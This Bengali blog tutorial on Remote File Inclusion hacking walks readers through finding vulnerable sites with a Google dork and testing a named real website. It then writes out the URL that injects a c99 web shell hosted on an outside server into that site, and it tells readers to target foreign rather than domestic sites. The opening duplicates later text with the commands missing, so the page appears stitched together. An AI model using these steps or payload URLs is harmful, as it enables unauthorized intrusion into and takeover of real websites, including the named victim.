আসসালামু আলাইকুম,
এখন গুগল ডরক দিয়ে সারচ করে ভালনারেবল সাইট খুজে নিন, চেস্টা করবেন দেশি ওয়েবসাইট গুলো বাদ দিয়ে চলতে।
এইযে গুগল ডরক,
উপরের ডকটি গুগলে নিয়ে সার্চ দিন। তাহলে আপনাকে “index.php?page=” এই টাইপের যত ওয়েবসাইট আছে, সবগুলো দেখতে পাবেন।
এখন মনে করেন আমি আমি http://www.cbspk.com/ এই সাইটটি খুঁজে পেয়েছি। এখন আমরা চাইব এটা vulnerable কি না। তাহলে লিখুন….
তাহলে এটি দেখাবে…
এখন যদি উক্ত ওয়েবসাইটটি অন্য ওয়েবসাইট নিয়ে খোলে তাহলে বুঝবেন যে এই ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে। এবার আসুন পরের ধাপে…
এরপর সাধারণত হ্যাকাররা তার ভিকটিমের ওয়েবসাইটে যে কোন Shells আপলোড করে। বেশিরভাগ হ্যাকাররা c99 shell বা r57 shell আপলোড করে।
এবার হ্যাকার ওয়েবসাইটটিতে একটি কমান্ড দিবে। কমান্ডটি হবে
এখন তাহলে এটি ওয়েবসাইট দেখব। দেখেন, কি দেখেন ?
By Unselected Tuner
কেমন আছেন?
গত কিছু দিন যাবত আপনাদের সাথে আমি হ্যাকিং ওয়ার্ল্ডের নানা কন্টেন্ট শেয়ার করছি। আমি নিজেও একজন শিক্ষানবিস বা নিউবাই। তাও যত জানি, আপনাদের জন্য উজার করে দিচ্ছি। আমাদের সিকিউরিটি অ্যানালিস্ট কমল ভাই এই বিষয়ে এক্সপার্ট এবং তার কল্যাণেই আমাদের এই জিআর+ ওয়েবসাইট টিকে আছে। ধন্যবাদ তাকে।
আজ দেখাব Remote file inclusion হ্যাকিং।
আজ দেখাব Remote file inclusion হ্যাকিং।
রিমোট ফাইল ইনক্লুশন বাংলা করলে দাড়ায় দূরবর্তী ফাইল প্রবেশ করানো। মানে আপনি এই হ্যাকিং মেথডের সাহায্যে কোন ওয়েবসাইটে অন্ন সার্ভারে হোস্ট করা প্রোগ্রাম শেল হিসেবে চালাতে পারবেন।
Remote file inclusion হ্যাকিং, একে সংক্ষেপে বলে RFI হ্যাকিং। এটি অনান্য হ্যাকিং মেথডের মধ্যে এটিও একটি অন্যতম জনপ্রিয় মেথড। অন্যন্যা পদ্ধতির মতো এই পদ্ধতিতেও আপনাকে ওয়েবসাইটের vulnerability বের করতে হবে। এখন ৯০% ফায়ার ওয়াল আরএফআই ইঞ্জেকশান রুখতে পারে, তাই এই মেথড সহজে কাজে আসে না।
এখন গুগল ডরক দিয়ে সারচ করে ভালনারেবল সাইট খুজে নিন, চেস্টা করবেন দেশি ওয়েবসাইট গুলো বাদ দিয়ে চলতে।
এইযে গুগল ডরক,
inurl:index.php?page=
উপরের ডকটি গুগলে নিয়ে সার্চ দিন। তাহলে আপনাকে “index.php?page=” এই টাইপের যত ওয়েবসাইট আছে, সবগুলো দেখতে পাবেন।
এখন ভালনারেবল কিনা পরীক্ষা করতে হবে।
নিচের লিঙ্কের মত পরিক্ষা করে দেখুন।
http://www.targetsite.com/index.php?page=http://blog.grplusbd.net
এখন মনে করেন আমি আমি http://www.cbspk.com/ এই সাইটটি খুঁজে পেয়েছি। এখন আমরা চাইব এটা vulnerable কি না। তাহলে লিখুন….
http://www.cbspk.com/v2/index.php?page=http://www.tunerpage.com
তাহলে এটি দেখাবে…
এখন যদি উক্ত ওয়েবসাইটটি অন্য ওয়েবসাইট নিয়ে খোলে তাহলে বুঝবেন যে এই ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে। এবার আসুন পরের ধাপে…
এরপর সাধারণত হ্যাকাররা তার ভিকটিমের ওয়েবসাইটে যে কোন Shells আপলোড করে। বেশিরভাগ হ্যাকাররা c99 shell বা r57 shell আপলোড করে।
আমি আপনাদের দেখাব c99 shell আপলোড করা।
এজন্য হ্যাকাররা যে কোন একটি ওয়েবহোষ্টটিং সাইটে তাদের সেল আপলোড করে নেয়। যেমন- ripway.com, 110mb.comইত্যাদি। এখন মনে করেন আমি ripway.com এই সাইটে সেল আপলোড করলাম। তাহলে আমার লিংক হবে…
http://h1.ripway.com/tjunselected/c99shell.php?
এবার হ্যাকার ওয়েবসাইটটিতে একটি কমান্ড দিবে। কমান্ডটি হবে
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/tjunselected/c99shell.php?
এখন তাহলে এটি ওয়েবসাইট দেখব। দেখেন, কি দেখেন ?
তবে অবশ্যই মনে রাখবেন লিংকের শেষে “ ? ” প্রশ্নবোধক চিহ্নটি লাগিয়ে দিবেন। নতুবা আপনার শেল কাজ করবে না।
By Unselected Tuner